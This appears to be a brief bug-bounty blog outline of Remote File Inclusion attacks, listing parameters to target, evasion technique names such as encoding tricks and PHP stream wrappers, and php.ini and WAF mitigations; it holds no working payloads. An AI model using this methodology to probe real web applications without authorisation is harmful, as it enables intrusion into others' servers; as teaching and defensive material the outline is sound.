Remote File Inclusion attack

By /
Remote File Inclusion attack

Remote File Inclusion attack

What is RFI (Remote File Inclusion)?

1: Remote File Inclusion.

2: Include another Server Files.

3: Vulnerable Parameter.

4: Upload/Execute Malicious Code.

RFI (Remote File Inclusion) Methodology?

1: Find Parameters: PAGE= FILE= TEMPLATE= LOC= URL=

2: Test External URLs.

3: Detect Security: Input Validation and Sanitization, Firewall Protections, Configuration Settings, File and Directory Controls.

4: Protocol Smuggling, Encoding Techniques, PHP Stream Wrapping, Host-Based Attacks, Obfuscation Techniques.

Protocol Smuggling:

1: FTP.

2: SMB/ CISF.

3: DNS.

Encoding Techniques:

1: Base64.

2: Double.

3: Hex Encoding.

PHP Stream Wrapping:

1: Data Wrapper.

2: PHP Input Wrapper.

3: PHP Filter Wrapper.

Host-Based Attacks:

1: Localhost Testing.

2: LFI.

Mitigation:

1: Input Validation and Sanitizations (Trusted words and Remove characters ../).

2: Firewall Protections (Outgoing HTTP request and WAF CRS).

3: Configuration Settings PHP.ini (allow_url_fopen =off and allow_url_include=off).

4: File and Directory Controls (File permissions and Root Restrictions Example open_basedir =/var/www/html/).

Bug Bounty

Must Read

Leave a Comment

Your email address will not be published. Required fields are marked *

Scroll to Top